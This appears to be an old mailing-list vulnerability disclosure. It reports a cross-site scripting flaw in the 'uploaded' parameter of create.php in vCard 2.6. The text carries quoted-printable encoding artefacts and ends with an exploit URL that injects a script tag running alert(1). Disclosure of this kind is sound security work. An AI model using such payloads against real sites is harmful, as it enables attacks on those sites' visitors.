Discovered By : Hasadya Raed Contact : RaeD@BsdMail.Com=20 Script: vCard 2.6 (c)2002=20=20 ***************************************************************************= ***=20=20 Bug in : create.php=20=20 ***************************************************************************= *****=20=20 Exploit : http://www.victim.com/path/create.php?uploaded=3D">**********alert(1);</scr= ipt>=20=20 ***************************************************************************= *****=20=20 --=20 _______________________________________________ Get your free email from http://bsdmail.com